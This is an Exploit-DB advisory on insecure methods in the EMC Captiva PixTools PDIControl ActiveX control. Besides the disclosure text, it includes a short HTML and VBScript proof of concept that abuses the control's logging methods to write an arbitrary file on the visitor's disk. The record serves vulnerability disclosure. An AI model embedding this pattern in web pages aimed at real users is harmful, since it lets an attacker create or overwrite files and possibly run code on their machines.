EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities

EDB-ID:

33263




Platform:

Windows

Date:

2009-10-01


source: https://www.securityfocus.com/bid/36566/info

The EMC Captiva PixTools Distributed Imaging ActiveX control is prone to multiple insecure-method vulnerabilities that affect the PDIControl.PDI.1 ActiveX control (PDIControl.dll).

Successfully exploiting these issues allows remote attackers to create or overwrite arbitrary local files, which may lead to arbitrary code execution.

PDIControl.dll 2.2.3160.0 is vulnerable; other versions may also be affected. 

<object classid='clsid:00200338-3D33-4FFC-AC20-67AA234325F3' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.SetLogLevel 1 test.SetLogFileName "c:\some.txt" test.WriteToLog 1, "Hello World!" End Sub </script>